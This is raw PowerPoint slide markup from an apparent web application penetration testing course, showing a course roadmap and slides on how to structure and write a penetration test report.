          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1661160"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The final penetration test report is the most lasting portion of the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As such, it is probably the most important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If our goal as penetration testers is to help target organizations improve security, the report is typically our most effective vehicle for doing so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But most people hate writing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some people enjoy report writing, but they are in the minority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t ignore this section because you don't enjoy it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It contains information to help you differentiate yourself, building on technical excellence with solid reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Let's make it easier to create quality reports by covering the various sections in depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Your report outline may vary, but the one we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'ll cover here is commonly used in this industry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Report Pieces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123907" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1584960"/>
            <a:ext cx="8153400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A penetration testing report format that works well includes the following components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Tahoma" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Executive summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Tahoma" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Tahoma" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Tahoma" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Tahoma" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Conclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All of the information gathered during the test becomes part of this reporting process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You may even include appendices with important notes, permission memos, and other items gathered or created during the test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="123908" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6685915" y="1889760"/>
            <a:ext cx="1939925" cy="2209800"/>
            <a:chOff x="1824" y="633"/>
            <a:chExt cx="2834" cy="2849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123909" name="Puzzle3"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3204" y="633"/>
              <a:ext cx="1114" cy="15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69 w 21600"/>
                <a:gd name="T25" fmla="*/ 7718 h 21600"/>
                <a:gd name="T26" fmla="*/ 19157 w 21600"/>
                <a:gd name="T27" fmla="*/ 202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headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123910" name="Puzzle2"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2880" y="1736"/>
              <a:ext cx="1778" cy="137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5394 w 21600"/>
                <a:gd name="T25" fmla="*/ 6735 h 21600"/>
                <a:gd name="T26" fmla="*/ 16182 w 21600"/>
                <a:gd name="T27" fmla="*/ 2044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a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123911" name="Puzzle4"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2192" y="1719"/>
              <a:ext cx="1072" cy="176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075 w 21600"/>
                <a:gd name="T25" fmla="*/ 5660 h 21600"/>
